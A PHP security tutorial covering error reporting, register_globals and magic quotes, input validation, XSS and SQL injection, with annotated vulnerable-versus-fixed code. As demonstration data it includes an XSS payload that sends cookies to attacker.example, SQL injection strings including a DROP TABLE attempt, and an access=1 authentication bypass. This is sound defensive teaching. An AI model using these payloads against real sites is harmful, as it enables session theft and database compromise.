Everyone knows that PHP is currently the most popular language for writing web applications. But like other scripting languages, PHP has a number of dangerous security pitfalls. In this tutorial we take a quick look at a few practical techniques that help you avoid some of the most common PHP security problems.
Tip 1: Use proper error reporting
During development, many programmers forget to turn on error reporting. That is a serious mistake: proper error reporting is not only the best debugging tool, it is also the best tool for spotting security weaknesses, because it lets you find as many of the problems you will run into as possible before the application goes live.
There are several ways to enable error reporting. You can set it in the php.ini configuration file (error_reporting = E_ALL), or switch it at runtime from within the script. The point is to report everything while developing, and to keep reporting everything in production but send it to a log file instead of the browser (display_errors = Off, log_errors = On): an error message shown to a user leaks file paths, query fragments and stack traces to anyone probing the site.
Enable error reporting
error_reporting(E_ALL);
Disable error reporting
error_reporting(0);
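The following bootstrap file is an added example (not code from the original article) that puts the two settings together: every error is reported and logged, but it is only displayed when the assumed environment variable APP_ENV is "development". It also turns reported errors into exceptions so that a notice cannot be silently ignored, and gives users a fixed, detail-free response. The log path and the variable name are assumptions; PHP 7 or later is assumed for the type declarations.

```php
<?php
// Added example, not part of the original article.
// Report everything, display only in development, log always.
// APP_ENV is an assumed environment variable name.

$isDevelopment = (getenv('APP_ENV') === 'development');

// Notices and warnings are the first sign of undefined variables and
// indexes, which are exactly the bugs an attacker turns into something worse.
error_reporting(E_ALL);

ini_set('display_errors', $isDevelopment ? '1' : '0');
ini_set('log_errors', '1');
ini_set('error_log', __DIR__ . '/../logs/php-error.log'); // assumed path, must be writable

// Convert every reported error into an exception: the code either handles
// it explicitly or the request stops, instead of continuing in an unknown state.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    if (!(error_reporting() & $severity)) {
        // Suppressed with @ or filtered out: fall back to PHP's default handling.
        return false;
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
});

// Last line of defence: the full exception goes to the log, the client
// only ever sees a generic message outside development.
set_exception_handler(function (Throwable $e) use ($isDevelopment): void {
    error_log((string) $e);
    http_response_code(500);
    echo $isDevelopment
        ? '<pre>' . htmlspecialchars((string) $e, ENT_QUOTES, 'UTF-8') . '</pre>'
        : 'Internal error';
});

// Constructed demonstration: reading an undefined index is now an exception
// rather than a notice that scrolls past unnoticed.
$request = ['username' => 'alice'];
try {
    $role = $request['role'];
} catch (ErrorException $e) {
    error_log('Caught: ' . $e->getMessage());
    $role = 'viewer';   // safe default chosen deliberately, not by accident
}
```

Include this file first in every entry point (a front controller or auto_prepend_file), before any output, since display_errors and the handlers only take effect from the point they are set.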
Tip 2: Do not rely on PHP's weak settings
There are a few PHP settings that should be turned OFF. They date from PHP 4, were deprecated in PHP 5.3, and were removed altogether in PHP 5.4, so on a current PHP they no longer exist; the advice below matters on older installations and for code that was written to depend on them.
Registering global variables
When register_globals is ON, every Environment, GET, POST, Cookie and Server variable (EGPCS) is defined as a global PHP variable. You no longer have to write $_POST['username'] to read the form field 'username'; plain $username already holds it.
You may be thinking: if register_globals = On is that convenient, why not use it? Because it creates serious security problems and can also collide with the names of your own local variables. Any variable your script reads before assigning it can be pre-set by whoever sends the request.
Look at the following code:
if( !empty( $_POST['username'] ) && $_POST['username'] == 'test123' && !empty( $_POST['password'] ) && $_POST['password'] == 'pass123' )
{
$access = true;
}
If register_globals is ON while this runs, the script never sets $access to false when the credentials are wrong; it only sets it to true when they are right. A user who appends access=1 to the query string therefore has $access already set to '1' before the check runs, and gets whatever the rest of the script grants to an authenticated user.
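The bypass and its fix, as an added example that is not part of the original article. PHP 5.4 and later no longer have register_globals, so extract() is used here only to reproduce its effect on any version; never call extract() on request data in real code, for exactly the reason shown. The forged request is constructed for the example, and the hard-coded credentials are kept from the article (real code would compare against password_verify()).

```php
<?php
// Added example, not the original article's code.
// Reproduces the register_globals bypass and shows the fix.

function checkAccessLegacy(array $request)
{
    // Emulates register_globals = On: every request key becomes a variable.
    // Do not do this in real code.
    extract($request);
    if (!empty($request['username']) && $request['username'] == 'test123'
        && !empty($request['password']) && $request['password'] == 'pass123') {
        $access = true;
    }
    // On a failed login this code never assigned $access, so whatever the
    // request put there survives: access=1 in the query string is enough.
    return !empty($access);
}

function checkAccessFixed(array $request)
{
    // 1. Initialise the flag before it is read, so an injected value is overwritten.
    // 2. Read input only from the request array, never from bare globals.
    // 3. Use strict, constant-time string comparison.
    $access = false;
    if (isset($request['username'], $request['password'])
        && hash_equals('test123', (string) $request['username'])
        && hash_equals('pass123', (string) $request['password'])) {
        $access = true;
    }
    return $access;
}

// Constructed request: wrong credentials plus an injected access flag,
// as sent by  ?username=nobody&password=wrong&access=1
$forged = ['username' => 'nobody', 'password' => 'wrong', 'access' => '1'];

var_dump(checkAccessLegacy($forged));  // legacy version: bypassed
var_dump(checkAccessFixed($forged));   // fixed version: denied
```

The legacy function returns true for the forged request because extract() created $access = '1' and nothing reset it; the fixed function returns false because $access starts as false and only the credential check can change it. Initialising every variable before use is the habit that makes code safe even on a host where register_globals cannot be turned off.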
On PHP 5.4 and later these directives no longer exist, so the following lines are only needed on older installations. The .htaccess form works only when PHP runs as an Apache module (mod_php) and the host allows AllowOverride for Options; with CGI/FastCGI or PHP-FPM use php.ini (or a per-directory .user.ini) instead.
Disable register_globals in .htaccess
php_flag register_globals 0
Disable register_globals in php.ini
register_globals = Off
Also disable the magic quotes settings: magic_quotes_gpc, magic_quotes_runtime and magic_quotes_sybase. They add backslashes to every incoming value regardless of where it will be used, which breaks data that is not going into SQL, gives a false sense of safety for data that is (they do nothing against numeric contexts or multibyte charset tricks), and make correct escaping harder because values arrive already altered.
Set in .htaccess
php_flag magic_quotes_gpc 0
php_flag magic_quotes_runtime 0
Set in php.ini
magic_quotes_gpc = Off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
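When you cannot change php.ini at all (shared hosting running an old PHP), the application can at least detect the settings at runtime. The following added example (not code from the original article) refuses to run if register_globals is on, since the global variables already exist by the time the script starts and cannot be undone, and strips the backslashes that magic_quotes_gpc added so the rest of the code sees raw input and escapes it itself. On PHP 5.4 and later both checks pass harmlessly: ini_get('register_globals') returns false, and get_magic_quotes_gpc() was removed in PHP 8.0, which is why the function_exists() guard is there. No type declarations are used so the file also parses on PHP 5.

```php
<?php
// Added example, not part of the original article.
// Runtime guard for legacy hosts where php.ini cannot be edited.

// register_globals cannot be undone once the request has started, so the
// only safe option is to stop rather than run in an unsafe configuration.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('register_globals is enabled; set register_globals = Off in php.ini');
}

// magic_quotes_gpc can be undone: remove the added backslashes from every
// request value, recursing into nested arrays such as name[]=... fields.
function stripMagicQuotes(&$value)
{
    if (is_array($value)) {
        foreach ($value as &$item) {
            stripMagicQuotes($item);
        }
        unset($item);   // break the reference left by foreach
    } elseif (is_string($value)) {
        $value = stripslashes($value);
    }
}

// @ silences the deprecation notice on PHP 7.4; on 8.0+ the function is gone.
if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
    stripMagicQuotes($_GET);
    stripMagicQuotes($_POST);
    stripMagicQuotes($_COOKIE);
    stripMagicQuotes($_REQUEST);
}

// Constructed check of the stripping logic itself, independent of the
// server's configuration: this is what a magic-quoted request looks like.
$sample = array('name' => "O\\'Brien", 'tags' => array("a\\\"b", 'plain'));
stripMagicQuotes($sample);
var_dump($sample);   // name is O'Brien, tags are a"b and plain
```

After this runs, every value must still be escaped exactly once, with the function for the context it goes into (SQL, HTML, shell); the point of stripping is to make that escaping predictable, not to skip it.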
Tip 3: Validate user input
You should of course validate user input, and to do that you first have to know what type of data you expect from the user for every field. Do this on the server: validation in the browser (JavaScript, HTML5 form attributes) is a convenience for honest users and is bypassed trivially with curl or a proxy, so it is not a defence against a malicious user. Check each value against the exact type, range and format the application expects, and reject anything that does not match rather than trying to clean it up.
Tip 4: Prevent cross-site scripting (XSS)
Web applications routinely accept input from a form and echo it back in a page. If you allow HTML in that input and print it unchanged, you are in danger: it lets an attacker plant JavaScript that runs in every visitor's browser in ways you did not anticipate. A single such hole is enough for an attacker's script to read the victim's cookies and take over their account. The defence is to encode every user-controlled value for the context where it is printed (HTML body, attribute, URL), and to mark the session cookie HttpOnly so that script cannot read it even if an injection slips through.
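An added example, not code from the original article, showing the vulnerable echo next to the encoded output and the cookie flags that limit the damage of a missed spot. The hostile comment and the attacker host are constructed for the example; the array form of session_set_cookie_params() assumes PHP 7.3 or later, and the Secure flag assumes the site is served over HTTPS.

```php
<?php
// Added example, not part of the original article.
// Output encoding against XSS, plus HttpOnly session cookies.

// Cookie flags must be set before session_start(). HttpOnly stops
// document.cookie from returning the session id, so an injected script
// cannot simply exfiltrate it; Secure keeps it off plain HTTP.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,    // assumes HTTPS
    'samesite' => 'Lax',
]);
session_start();

// One encoder for HTML body and attribute contexts. ENT_QUOTES escapes both
// quote characters so a value inside value="..." cannot break out of the
// attribute; ENT_SUBSTITUTE and the explicit charset stop invalid UTF-8
// from producing an empty string or a multibyte bypass.
function e(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed hostile input: what a user submitted as a "comment".
$comment = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable: the comment is reflected verbatim and the script executes.
// echo "<p>$comment</p>";

// Safe in an HTML body: the browser displays the tags as text.
echo '<p>' . e($comment) . "</p>\n";

// Safe in an attribute, thanks to ENT_QUOTES.
echo '<input type="text" name="comment" value="' . e($comment) . "\">\n";

// A URL parameter needs URL encoding first, then HTML encoding of the result,
// because the value passes through two parsers in that order.
echo '<a href="/search?q=' . e(rawurlencode($comment)) . "\">search</a>\n";
```

Store the comment as the user typed it and encode at output time; stripping tags on input loses data and still leaves attribute and URL contexts unprotected. If the application genuinely must allow some HTML, use an HTML sanitiser with an element and attribute whitelist rather than htmlspecialchars().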
Tip 5: Prevent SQL injection
PHP does not escape query values for you: anything you concatenate into an SQL string arrives in the database exactly as the user sent it. At the very least, every value must go through mysqli_real_escape_string() with the live connection as its first argument, since correct escaping depends on the connection's character set. Prepared statements with bound parameters are the better option, because they keep the data out of the SQL text altogether.
$username = mysqli_real_escape_string( $link, $_GET['username'] );
mysqli_query( $link, "SELECT * FROM tbl_employee WHERE username = '" . $username . "'" );
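The same lookup with a prepared statement, as an added example that is not the original article's code. The connection details and the tbl_employee columns are assumptions; get_result() needs the mysqlnd driver, and the nullable return type assumes PHP 7.1 or later. The second function covers the case a bound parameter cannot handle, a column name supplied by the user, which has to come from a whitelist.

```php
<?php
// Added example, not part of the original article.
// Parameterised queries with mysqli; identifiers via a whitelist.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);  // throw on SQL errors

$db = new mysqli('localhost', 'app', 'secret', 'company');  // assumed credentials
$db->set_charset('utf8mb4');   // charset mismatches are themselves an injection vector

function findEmployee(mysqli $db, string $username): ?array
{
    // The SQL text is sent once, with a placeholder; the value travels
    // separately and can never change the statement's structure.
    $stmt = $db->prepare('SELECT id, username, department FROM tbl_employee WHERE username = ?');
    $stmt->bind_param('s', $username);   // 's' binds the value as a string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function listEmployees(mysqli $db, string $sortBy): array
{
    // Column names cannot be bound, so the user's choice selects an entry
    // from a fixed map; anything else falls back to a known-safe default.
    $allowed = ['username' => 'username', 'department' => 'department'];
    $column  = $allowed[$sortBy] ?? 'username';
    $result  = $db->query("SELECT id, username, department FROM tbl_employee ORDER BY `$column`");
    return $result->fetch_all(MYSQLI_ASSOC);
}

// The classic payload now matches only an employee whose name is literally
// this string, which is to say nobody.
$payload = "admin' OR '1'='1";
var_dump(findEmployee($db, $payload));

// An injection attempt in the sort column is ignored in favour of the default.
print_r(listEmployees($db, 'username; DROP TABLE tbl_employee'));
```

With PDO the pattern is the same (prepare(), bindValue() or an array passed to execute()); in either API, set emulated prepares off where the driver supports it so the database, not the client library, does the separation.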
That concludes this short article, in which we have covered several PHP security problems that cannot be ignored during development. Whether and how to apply them is ultimately up to the developer. We hope this article is useful to you.